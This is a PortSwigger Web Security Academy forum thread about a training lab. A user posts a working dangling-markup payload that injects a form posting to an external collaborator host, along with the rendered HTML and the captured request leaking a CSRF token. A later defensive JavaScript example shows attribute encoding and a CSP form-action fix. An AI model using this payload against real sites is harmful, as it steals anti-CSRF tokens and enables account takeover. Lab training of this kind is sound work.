Issue with "Reflected XSS protected by very strict CSP, with dangling markup attack" Lab

Prajyot | Last updated: Dec 27, 2023 10:53AM UTC

I understand that the current solution for this lab is broken because of Chrome's recent updates. I believe that I may have found an alternative solution, since I get an interaction with the CSRF token in the request body on my collaborator when I try it on myself. However, it doesn't seem to work when I deliver it to the victim. Here's my payload for reference:

```
<script>
location = 'https://0a49005803315b4185f35e92000600e2.web-security-academy.net/my-account?email=%22%3E%3C/form%3E%3Cform%20action=%22https://fxglmiv6o6vmf3cpl6pv2dier5xwlm9b.oastify.com%22%20id=%22x%22%20method=%22POST%22%3E%3Cinput%20type=%22submit%22%20value=%22Click%20Me%22%3E%3Cinput%20type=%22hidden%22%20name=%22data%22%20value=%27';
</script>
```

Here's how my payload renders when the page loads:

```
<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
<label>Email</label>
<input required="" type="email" name="email" value="">
</form>
<form action="https://fxglmiv6o6vmf3cpl6pv2dier5xwlm9b.oastify.com" id="x" method="POST"><input type="submit" value="click me">
<input type="hidden" name="data" value="&quot;>
<input required type=&quot;hidden&quot; name=&quot;csrf&quot; value=&quot;i0czssDyg8WAQ1WQkQXc3s7doqUg0Gtw&quot;>
<button class=" button'="">
Update email
</form>
```

And the interaction I get on collaborator:

```
POST / HTTP/1.1
Host: fxglmiv6o6vmf3cpl6pv2dier5xwlm9b.oastify.com
Connection: keep-alive
Content-Length: 202
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://0a49005803315b4185f35e92000600e2.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a49005803315b4185f35e92000600e2.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

data=%22%3E%0D%0A++++++++++++++++++++++++++++%3Cinput+required+type%3D%22hidden%22+name%3D%22csrf%22+value%3D%22akQtuN2ZLE9IJAoKsrnsO2gAw3MVPBRR%22%3E%0D%0A++++++++++++++++++++++++++++%3Cbutton+class%3D
```
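As an added illustration from the defensive side (this is not code from the thread or from PortSwigger's lab), the Node.js snippet below renders the change-email form twice: once with the `email` parameter reflected raw into the `value` attribute, which reproduces the break-out visible in the rendered markup above, and once with HTML attribute encoding applied. The injected string is the URL-decoded `email` value from the post, with the collaborator host swapped for the placeholder `collaborator.example`; the CSRF token is a constructed value. The helper `formActionBeforeToken` answers the question a defender cares about: which `<form>` start tag most recently precedes the CSRF token in the document, i.e. where a submit would send it.

```javascript
// Added example, not from the thread: attribute encoding versus raw reflection
// of a query parameter inside an HTML attribute (dangling markup).

// Encode a value for safe placement inside a double-quoted HTML attribute.
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Shared template for the change-email form. emailAttr is whatever the caller
// decided to put into the value attribute; csrf is the session's anti-CSRF token.
function buildForm(emailAttr, csrf) {
  return [
    '<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">',
    '  <label>Email</label>',
    `  <input required type="email" name="email" value="${emailAttr}">`,
    `  <input required type="hidden" name="csrf" value="${csrf}">`,
    '  <button class="button" type="submit">Update email</button>',
    '</form>',
  ].join('\n');
}

// 'Before': the reflected parameter is dropped in unencoded, which is the
// behaviour the rendered markup in the post shows.
function renderChangeEmailFormUnsafe(email, csrf) {
  return buildForm(email, csrf);
}

// 'After': the reflected parameter is attribute-encoded first, so quotes and
// angle brackets cannot terminate the attribute or open a new tag.
function renderChangeEmailForm(email, csrf) {
  return buildForm(escapeHtmlAttr(email), csrf);
}

// Count <form start tags in the rendered HTML; a break-out adds a second one.
function countFormTags(html) {
  return (html.match(/<form\b/gi) || []).length;
}

// Return the action attribute of the last <form start tag that precedes the
// CSRF token, or null if the token is missing or no form precedes it.
function formActionBeforeToken(html, csrf) {
  const tokenIdx = html.indexOf(csrf);
  if (tokenIdx === -1) return null;
  const before = html.slice(0, tokenIdx);
  const forms = [...before.matchAll(/<form\b[^>]*\baction="([^"]*)"/gi)];
  return forms.length ? forms[forms.length - 1][1] : null;
}

// Constructed input: the URL-decoded email parameter from the post, with the
// collaborator host replaced by a placeholder. The CSRF token is made up.
const INJECTED_EMAIL =
  '"></form><form action="https://collaborator.example" id="x" method="POST">' +
  '<input type="submit" value="Click Me"><input type="hidden" name="data" value=\'';
const SAMPLE_CSRF = 'constructedCsrfTokenValue0000';

const unsafeHtml = renderChangeEmailFormUnsafe(INJECTED_EMAIL, SAMPLE_CSRF);
const safeHtml = renderChangeEmailForm(INJECTED_EMAIL, SAMPLE_CSRF);

console.log('raw reflection: forms =', countFormTags(unsafeHtml),
  'token sits under form action', formActionBeforeToken(unsafeHtml, SAMPLE_CSRF));
console.log('encoded:        forms =', countFormTags(safeHtml),
  'token sits under form action', formActionBeforeToken(safeHtml, SAMPLE_CSRF));
```

With raw reflection the token ends up under the injected form whose action is the external host; with encoding there is one form and the token stays under `/my-account/change-email`. Independently of output encoding, a CSP `form-action 'self'` directive stops the browser from submitting any form to a foreign origin, which closes the exfiltration path this lab is built around even when the markup injection itself succeeds.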

Dominyque, PortSwigger Agent | Last updated: Dec 27, 2023 01:03PM UTC

Hi,

The lab should solve with the given solution. If you are experiencing issues with the lab, can you please send a screen recording of your attempt to support@portswigger.net?

Prajyot | Last updated: Dec 28, 2023 05:20AM UTC

Is the victim user configured to search and click on anchor tags only?

Dominyque, PortSwigger Agent | Last updated: Dec 28, 2023 07:30AM UTC

Hi Prajyot,

It is beyond the scope of technical support to provide guidance outside of using the given solution.

Prajyot | Last updated: Dec 28, 2023 07:59AM UTC

Well, it's solved now :)

